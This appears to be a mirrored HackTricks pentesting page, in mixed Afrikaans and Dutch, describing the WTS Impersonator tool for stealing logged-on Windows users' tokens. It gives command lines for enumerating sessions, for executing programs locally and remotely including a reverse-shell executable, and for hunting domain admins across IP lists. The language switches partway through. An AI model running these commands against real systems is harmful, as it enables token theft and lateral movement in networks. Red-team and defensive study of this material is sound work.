mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-28 15:41:34 +00:00
4.4 KiB
4.4 KiB
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud GitHub-opslagplekke.
Die WTS Impersonator-instrument maak gebruik van die "\pipe\LSM_API_service" RPC Genoemde pyp om stilletjies ingelogde gebruikers op te som en hul tokens te kaap, terwyl tradisionele Token Impersonation-tegnieke omseil word. Hierdie benadering fasiliteer naadlose laterale bewegings binne netwerke. Die innovasie agter hierdie tegniek word toegeskryf aan Omri Baso, wie se werk beskikbaar is op GitHub.
Kernfunksionaliteit
Die instrument werk deur 'n reeks API-oproepe:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
Sleutelmodules en Gebruik
- Gebruikers Enumereren: Lokale en externe gebruikersenumeratie is mogelijk met de tool, met behulp van commando's voor beide scenario's:
- Lokaal:
.\WTSImpersonator.exe -m enum
- Extern, door een IP-adres of hostnaam op te geven:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
- Commando's Uitvoeren: De modules
exec
enexec-remote
vereisen een Service-context om te functioneren. Lokale uitvoering vereist eenvoudigweg het WTSImpersonator uitvoerbare bestand en een commando: - Voorbeeld voor lokale commando-uitvoering:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- PsExec64.exe kan worden gebruikt om een service-context te verkrijgen:
.\PsExec64.exe -accepteula -s cmd.exe
- Externe Commando-Uitvoering: Hierbij wordt op afstand een service gemaakt en geïnstalleerd, vergelijkbaar met PsExec.exe, waardoor uitvoering met de juiste machtigingen mogelijk is.
- Voorbeeld van externe uitvoering:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- Gebruikersjachtmodule: Richt zich op specifieke gebruikers op meerdere machines en voert code uit onder hun referenties. Dit is vooral handig voor het targeten van Domeinbeheerders met lokale beheerdersrechten op verschillende systemen.
- Gebruiksvoorbeeld:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Andere manieren om HackTricks te ondersteunen:
- Als je je bedrijf geadverteerd wilt zien in HackTricks of HackTricks in PDF wilt downloaden, bekijk dan de ABONNEMENTSPAKKETTEN!
- Koop de officiële PEASS & HackTricks merchandise
- Ontdek The PEASS Family, onze collectie exclusieve NFT's
- Sluit je aan bij de 💬 Discord-groep of de telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel je hacktrucs door PR's in te dienen bij de HackTricks en HackTricks Cloud github-repo's.